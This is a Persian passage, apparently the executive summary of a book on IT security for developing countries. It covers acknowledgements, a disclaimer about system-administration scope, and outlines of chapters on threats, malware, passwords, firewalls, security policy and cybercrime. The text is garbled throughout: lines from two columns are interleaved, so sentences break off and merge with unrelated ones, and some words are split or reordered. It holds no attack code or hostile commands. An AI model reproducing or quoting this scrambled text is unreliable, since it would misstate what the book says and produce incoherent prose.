ﺳﺎﺯﻧﺪﺓ ﺍﻳﺸﺎﻥ ﺗﺸﻜﺮ ﻣـﻲﻛﻨـﻴﻢ؛ ﻭ ﻫﻤﭽﻨـﻴﻦ ﻣﺮﺍﺗـﺐ ﺗـﺸﻜﺮ ﻭ ﻫﺰﺍﺭ ﻋﻨﻮﺍﻥ ﺍﺯ ﻛﺘﺎﺑﻬﺎﻱ ﻓﻨﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣﺮﺩﻡ ﻛﺸﻮﺭﻫﺎﻱ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﻛﻪ ﻭﺿﻌﻴﺖ ﻛﺘﺎﺑﻬﺎ ﻭ
ﺍﻣﺘﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻤﺎﻣﻲ ﺩﺳﺖﺍﻧﺪﻛﺎﺭﺍﻥ ﻭ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑـﻪ ﺭﻭﻧـﺪ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﺩﺭ ﺟﻬـﺎﻥ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺭﺍ
ﭼﺎﭖ ﺍﻳﻦ ﻛﺘﺎﺏ ﻛﻤﻚ ﻛﺮﺩﻧﺪ ﺍﻋﻼﻡ ﻣﻲﻧﻤﺎﻳﻴﻢ.
ﺩﻳﺪﻩﺍﻧﺪ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﻣﺸﺎﺭﻛﺖ ﺍﻭﺭﻟﻲ ﺩﺭ ﺳﻴﺮ ﺗﻮﺍﻧﻤﻨـﺪﻱ ﻋﻠﻤـﻲ
ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻪ ﻣﺮﺟﻌﻲ ﺁﻣﻮﺯﺷـﻲ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺟﻬﺖ ﺁﺷﻨﺎﻳﻲ ،ﭘﺨﺶ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ
Windows ،Unixﻳــﺎ Macintoshﺍﺳــﺖ ﻭ ﻧــﻪ ﻣﺮﺟﻌــﻲ ﻟﺬﺍ ﻛﺎﻫﺶ ﺷﻜﺎﻑ ﺩﻳﺠﻴﺘﺎﻟﻲ ﭼﻘﺪﺭ ﻣﺆﺛﺮ ﻭ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺑـﻮﺩﻩ
ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺩﺭ ﻛﻨـﺎﺭ ﺭﺍﻫﻨﻤﺎﻫـﺎﻱ ﺍﺳﺖ.
ﺭﺍﻫﺒﺮﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﺍﺯ ﮔﺮﺩﺁﻭﺭﻧﺪﮔﺎﻥ ﻛﺘﺎﺑﻬﺎﻱ ﻓﻮﻕﺍﻟﺬﻛﺮ ﺑﺮﺍﻱ
ﻣﺪﻳﺮﻳﺖ ﺗﻐﻴﻴﺮﺍﺕ ﻭﺳﻴﻊ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻛﻤــﻚ ﺷﺎﻳــﺴﺘﻪ ﻭ ﻣــﺸﺘﺎﻗﺎﻧﻪ ﺟﻬــﺖ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟــﺐ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﻛﻨﺪ ،ﺣﺘﻲ ﺍﮔـﺮ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮﺍﺕ ﻛﺘﺎﺑﻬﺎﻳﺸﺎﻥ ﺩﺭ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﻪ ﮔﺮﻣﻲ ﺗـﺸﻜﺮ
ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺭﺍﺣﺘﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻛﻨﻴﻢ .ﺷﻮﺭ ﻭ ﺍﺷﺘﻴﺎﻕ ﺁﻧﺎﻥ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑـﻪ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﺑﻪ ﻣﻨﺎﺑﻊ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺴﻴﺎﺭﻱ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻩﺍﻳﻢ ،ﻭﻟﻲ ﺍﮔﺮ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﺭﺍﻫﻨﻤﺎ ﺑﻬﺘﺮﻳﻦ ﻧﻤﻮﻧﺔ ﻫﻤﻜﺎﺭﻱ ﺗﺨﺼﺼﻲ ﻭ ﺑﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ
ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻭ ﻭﺻﻠﻪﻫﺎﻱ ٣٣ﭘﻴﺸﻨﻬﺎﺩﻱ ﻣﻮﺟﻮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻲ ﺍﻣﺮﻭﺯ ﺍﺳﺖ.
ﻦ ﺍﻳﻨﺘﺮﻧﺘ ﹺ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺗﻤﺪﻥ ﻧﻮﻳ ﹺ
ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺟﺎﻧﺐ ﺍﺣﺘﻴﺎﻁ ﺭﺍ ﺭﻋﺎﻳﺖ ﻛﻨﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ
ﺑﻌﺪ ﺍﺯ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﻫـﺴﺘﻪ ،٣٤ﻣﻌﻤـﺎﺭﻱ ﻭ ﻳـﺎ ﺩﺳـﺘﻮﺭﺍﺕ ﺩﺭ ﺍﻳﻨﺠﺎ ﻻﺯﻡ ﻣـﻲﺩﺍﻧـﻴﻢ ﺍﺯ ﺗـﺎﻡ ﻛﻠـﺮﻣﻦ ،٢٤ﻣﺘﺨـﺼﺺ ﺍﺭﺷـﺪ
ﻲ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﺢ ﻛﻼﻥ ﺑﺴﺎﺩﮔﻲ ﻲ ﺗﺄﺛﻴﺮﺍﺕ ﺍﻣﻨﻴﺘ ﹺ
ﺳﻴﺴﺘﻤﻬﺎ ،ﺍﺭﺯﻳﺎﺑ ﹺ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺓ ﺩﺍﺩﻩﻫﺎ ٢٥ﺩﺭ ﺗﻴﻢ ﺍﻣﻨﻴﺖ ﺧﺰﺍﻧﺔ ﺑﺨﺶ ﺳﻴﺎﺳﺖ
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺍﻭﻝ ﺁﻧﭽﻪ ﻛﻪ ﺍﻭﺿﺎﻉ ﺭﺍ ﺑﺪﺗﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻛﻨﻮﻥ ﻧﻔـﻮﺫﮔﺮﺍﻥ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ﻗﺎﺩﺭ ﺑﻪ ﺗﻮﺳﻌﻪ ﻭ ﮔـﺴﺘﺮﺵ ﺗﻬﺪﻳـﺪﺍﺕ ﺧـﻮﺩ ﻣـﻲﺑﺎﺷـﻨﺪ :ﻣﺜـﻞ
ﺗﺮﻛﻴﺒــﻲ ﺍﺯ ﻭﻳﺮﻭﺳــﻬﺎ ،٧ﻛﺮﻣﻬــﺎ ٨ﻭ ﺗﺮﺍﻭﺍﻫــﺎﻳﻲ ٩ﻛــﻪ ﻣــﻲﺗﻮﺍﻧــﺪ
ﺑﺨﺶ ﺍﻭﻝ ﻛﺘﺎﺏ ﻣﻘﺪﻣﻪﺍﻱ ﺑﺮ ﻣﺒﺎﺣـﺚ ﻛﻠـﻲ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻋـﺼﺮ
ﺁﺳﻴﺒﻬﺎﻱ ﺷﺪﻳﺪﺗﺮﻱ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺩﺍﺩﻩﻫﺎ ﻭﺍﺭﺩ ﻛﻨﺪ .ﺍﻳﻦ
ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻣﻲﺑﺎﺷﺪ .ﻣﺮﺩﻡ ﺍﺯ ﮔﺬﺷﺘﻪ ﺗﺎ ﻛﻨﻮﻥ ﻫﻤﻴـﺸﻪ ﻧﮕـﺮﺍﻥ
ﺻــﺪﻣﺎﺕ ﺣﺘــﻲ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺍﺯ ﺑﻌــﻀﻲ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﻣﺨــﺮﺏ
ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩﻩﺍﻧﺪ ،ﺍﻣﺎ ﺍﺑﺪﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﻭﻧﺪ ﻛﺎﺭ ﺭﺍ
)ﺑﺪﺍﻓﺰﺍﺭﻫﺎ( ١٠ﻧﻴـﺰ ﺧﻄﺮﻧـﺎﻛﺘﺮ ﺑﺎﺷـﻨﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ
ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺑﺨﺶ ﻣﺤﺪﻭﺩﺓ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ
ﭘﻴﺸﺮﻓﺘﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻧﻲ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗـﺮﺍﺭ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﺮﺳﻴﻢ ﻛﺮﺩﻩ ﻭ ﺍﻧﻮﺍﻉ ﻣﺘﻌﺪﺩﻱ ﺍﺯ ﺍﻋﻤـﺎﻝ ﻧﺎﻣﻨﺎﺳـﺐ
ﻣﻲﺩﻫﻨﺪ ،ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺁﻧﻬـﺎ
ﺩﺭ ﻗﺒﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ ﻭ ﺧﻄﺮﺍﺕ ﻛﺎﺭ ﺑﺎ
ﺗﻨﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺣﺎﺻﻞ ﻣﻲﺷﻮﺩ.
ﺁﻧﻬﺎ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻧﻤﺎﻳﺪ.
ﺑﺨﺶ ﺍﻭﻝ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺍﺳﺖ: ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﺍﻣﻨﻴﺖ ﺩﺭ
• ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
• ﺗﻌﺮﻳﻒ ﺍﻣﻨﻴﺖ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ
• ﭘﻴﺪﺍﻳﺶ ﻭ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ
ﺍﻫﻤﻴﺖ ﺷـﺎﻳﺎﻧﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ .ﻭﺍﺿـﺢ ﺍﺳـﺖ ﻛـﻪ ﺍﻳﻨﺘﺮﻧـﺖ
• ﻛﻠﻴﺎﺕ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ
ﻓﺮﺻﺘﻬﺎﻳﻲ ﻃﻼﻳﻲ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓـﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﻛـﻪ
• ﻣﻬﺎﺟﻤﻴﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺣﺪﻭﺩ ﺩﻩ ﺳﺎﻝ ﻗﺒﻞ ﺣﺘﻲ ﺗﺼﻮﺭ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﺑﻮﺩ .ﺍﻟﺒﺘﻪ ﺩﺳﺘﺮﺳﻲ
ﺁﮔﺎﻫﻲ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻧﻨﺪ ﻭﺟﻮﺩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻫﻤﻴﺸﻪ ﻫﻢ ﺍﺭﺯﺍﻥ ﻧﻴﺴﺖ .ﺍﻳﻨﺘﺮﻧﺖ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻗـﺎﺩﺭ
ﻭ ﮔﺴﺘﺮﺵ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺧـﺎﺹ ،ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ،ﻣـﺪﻳﺮﺍﻥ ﻭ ﻣﻲﺳﺎﺯﺩ ﺗﺎ ﻧﮕﺎﻫﻲ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣﻮﺿـﻮﻋﺎﺕ ﺩﺍﺷـﺘﻪ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻛﻤـﻚ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ ﺗـﺎ ﺑـﺮﺍﻱ ﺗﻘﻮﻳـﺖ ﺍﻳﻤﻨـﻲ ﺑﺎﺷــﻨﺪ ﻭ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺍﺭﺗﺒــﺎﻁ ﻣــﺮﺩﻡ ﺍﺯ ﻃﺮﻳــﻖ ﭘــﺴﺖ
ﺷﺒﻜﻪﻫﺎﻱ ﺧـﻮﺩ ﺩﺭ ﻣﻨـﺰﻝ ﻭ ﻳـﺎ ﻣﺤـﻞ ﻛـﺎﺭ ﺩﺭ ﻣﻘﺎﺑـﻞ ﻧﻘـﺾ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﻴﺎﺭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺍﺯ ﺧﺪﻣﺎﺕ ﭘﺴﺘﻲ ﺳﻨﺘﻲ ﺷﺪﻩ ﺍﺳﺖ.
ﺣﺮﻳﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﺆﺛﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ. ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺻﻮﻝ ﺗﺠﺎﺭﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﺗـﺄﺛﻴﺮ ﮔﺬﺍﺷـﺘﻪ ﺍﺳـﺖ؛
ﺑﺎﺯﺍﺭﻫﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻛﻨﻮﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻛﺎﻻﻫـﺎﻱ
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺩﻭﻡ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ١١ﺑﻔﺮﻭﺷﻨﺪ .ﺍﮔﺮﭼﻪ ﻫﻨـﻮﺯ ﺗﻌـﺪﺍﺩ ﺭﻗﺒـﺎ ﺩﺭ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺑﺎﺯﺍﺭ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺎﺩﮔﻲ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎ
ﺑﺨﺶ ﺩﻭﻡ ﻛﺘﺎﺏ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺍﺯ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪﺍﻱ ﻭ ﻭ ﻣﺤﺼﻮﻻﺕ ﺷﺮﻛﺘﻬﺎﻱ ﺭﻗﻴﺐ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ﻭ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻣﺘﻌﺪﺩ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻳﺎ ﻣﺤﻞ ﻛـﺎﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻭﺳﻴﻊ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻧﺪﺍﺭﻧـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ
ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﻟﺒﺘﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻜﻲ ﻛﻪ ﻗـﺎﺩﺭ ﺑـﻪ ﺗﻌﻴـﻴﻦ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺁﻧﺴﻮﻱ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ ﺑـﺮﺍﻱ ﻫـﺮ
ﺩﻗﻴــﻖ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺭﺍﻫﺒــﺮﻱ ﺁﻥ ﺳﻴﺴﺘﻢ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺴﻴﺎﺭ ﺟـﺬﺍﺏ ﺍﺳـﺖ ،ﻫﻤﻜـﺎﺭﻱ ﮔـﺴﺘﺮﺩﻩﺍﻱ
ﺳﻴﺎﺳﺘﻬﺎ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻧﻲ ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻔﻴﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ .ﺍﻳـﻦ ﺑﺮﺍﻱ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﻣﺪﻝ ﻳﻚ ﻧﻈﺎﻡ ﺷﺒﻜﻪﺍﻱ ﻛﺎﺭﺁﻣﺪ ﻭ ﺟﻬﺎﻧﻲ ﻻﺯﻡ
ﺑﺨﺶ ﺑﻪ ﺗﺸﺮﻳﺢ ﺍﺻﻮﻝ ﺍﺳﺎﺳﻲ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺮﺩﺍﺧﺘﻪ ﻭ ﺍﺳﺖ.
ﺩﺭ ﻣﻮﺭﺩ ﻓﻨﻮﻧﻲ ﻛﻪ ﻣﻮﺟﺐ ﻛﺎﻫﺶ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣـﻲﺷـﻮﻧﺪ
ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﻣـﺬﻛﻮﺭ ﺩﺭ ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﻛﺘﺎﺏ:
ﺑﺨﺶ ﺩﻭﻡ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ: ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺿﺮﻭﺭﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ؛ ﺗﺄﺛﻴﺮ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛ • ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺗﻮﺳﻌﻪ
7 Viruses
8 Worms
9 Trojans
10 )Malware (Malicious Software
11 Online
٢١ ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ
ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺗﺤﻠﻴـﻞ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻳـﻚ ﺷـﺮﻛﺖ • ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ،ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ ١٢ﺍﺯ ﻃﺮﻳـﻖ •
ﻧﻮﻋﻲ؛ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ١٣ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ١٤؛
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﻳﻪ ﻫﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﻭ • ﺍﻧﻮﺍﻉ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻭ ﭼﮕﻮﻧﮕﻲ ﮔﺴﺘﺮﺵ ﺁﻧﻬﺎ؛ •
ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ؛ ﻣﺒﻨﺎﻱ ﻛﺎﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺩﻟﻴـﻞ ﺍﻳﻨﻜـﻪ •
ﻧﻘﺶ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ،ﺷـﺒﻜﻪﻫـﺎ ﻭ • ﺍﺑﺰﺍﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ؛
ﺩﺍﺩﻩﻫﺎ؛
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﺎﻣﻞ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ،ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ •
ﺍﻣﻨﻴﺖ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﺎﻣﻞ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ،ﻓﺮﺁﻳﻨﺪ ﺍﺳﺘﺨﺪﺍﻡ • ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ١٥؛
ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺍﻣﻨﻴﺘﻲ ﺧﺎﺭﺟﻲ؛ ﻣﻔﺎﻫﻴﻢ ﭘﻴﺸﺮﻓﺘﻪﺗﺮﻱ ﭼﻮﻥ ﺳﺎﺧﺘﺎﺭ ﺷﺒﻜﻪﻫـﺎﻱ TCP/IP •
١٦
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﮔﺰﺍﺭﺵ ﻭﻗﺎﻳﻊ ﻭ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ؛ • ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻼﻗﻪﻣﻨﺪ.
ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎ؛ ﻭ • ﺑﺨﺶ ﺩﻭﻡ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺯ
ﻟﺤﺎﻅ ﻓﻨﻲ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ .ﺍﻳﻦ ﺑﺨـﺶ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ
ﺭﺍﻫﻨﻤﺎﻳﻴﻬــﺎﻱ ﺿــﻤﻴﻤﻪ ﻭ ﻋــﻮﺍﻣﻠﻲ ﻛــﻪ ﺑــﻪ ﻃﺮﺍﺣــﻲ ﻭ •
ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻭ ﺑﺨﺶ ﺳﻮﻡ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺳـﺎﺯﻣﺎﻧﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ ﻣﻨﺎﺳﺐ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ.
ﺍﻣﻨﻴﺖ ﻣﻲﻧﮕﺮﺩ.
